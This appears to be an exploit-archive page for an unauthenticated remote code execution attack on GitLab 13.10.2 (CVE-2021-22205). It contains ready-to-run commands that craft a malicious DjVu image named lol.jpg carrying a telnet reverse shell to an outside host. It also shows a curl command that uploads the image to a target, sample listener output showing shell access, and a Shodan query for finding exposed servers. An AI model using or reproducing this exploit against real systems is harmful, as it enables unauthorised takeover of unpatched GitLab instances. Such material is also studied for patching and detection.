GitLab 13.10.2 Remote Code Execution

GitLab 13.10.2 Remote Code Execution: Posted Nov 17, 2021; Authored by Jacob Baines; GitLab version 13.10.2 remote code execution exploit that provides a reverse shell.; tags | exploit, remote, shell, code execution; advisories | CVE-2021-22204, CVE-2021-22205; SHA-256 | a3816f4a73b68abc9aa497e0982428e2bde3d7b0a005094907ca8484d9f39f60; Download | Favorite | View

GitLab 13.10.2 Remote Code Execution

# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
# Date: 11/01/2021
# Exploit Author: Jacob Baines
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/gitlab-org/gitlab
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
# CVE : CVE-2021-22205
# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed

Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.

1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.

echo -e
"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="
| base64 -d > lol.jpg
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
echo -n
"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="
| base64 -d >> lol.jpg

2. Sending the payload. Any random endpoint will do.

curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)

2a. Sample Output from the reverse shell:

$ nc -lnvp 1270
Listening on [0.0.0.0] (family 0, port 1270)
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport
34836)
whoami
git
id
uid=998(git) gid=998(git) groups=998(git)

Top Authors In Last 30 Days

Red Hat 167 files
Ubuntu 107 files
indoushka 53 files
Debian 22 files
nu11secur1ty 18 files
Apple 13 files
Google Security Research 7 files
Gentoo 7 files
CraCkEr 6 files
LiquidWorm 4 files

File Archives

Systems

AIX (428)
Apple (2,016)
BSD (374)
CentOS (57)
Cisco (1,925)
Debian (6,844)
Fedora (1,692)
FreeBSD (1,245)
Gentoo (4,329)
HPUX (879)
iOS (355)
iPhone (108)
IRIX (220)
Juniper (68)
Linux (46,826)
Mac OS X (687)
Mandriva (3,105)
NetBSD (256)
OpenBSD (485)
RedHat (13,921)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,946)
UNIX (9,317)
UnixWare (186)
Windows (6,589)
Other

GitLab 13.10.2 Remote Code Execution

GitLab 13.10.2 Remote Code Execution

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

GitLab 13.10.2 Remote Code Execution

Share This

GitLab 13.10.2 Remote Code Execution

File Archive:

September 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems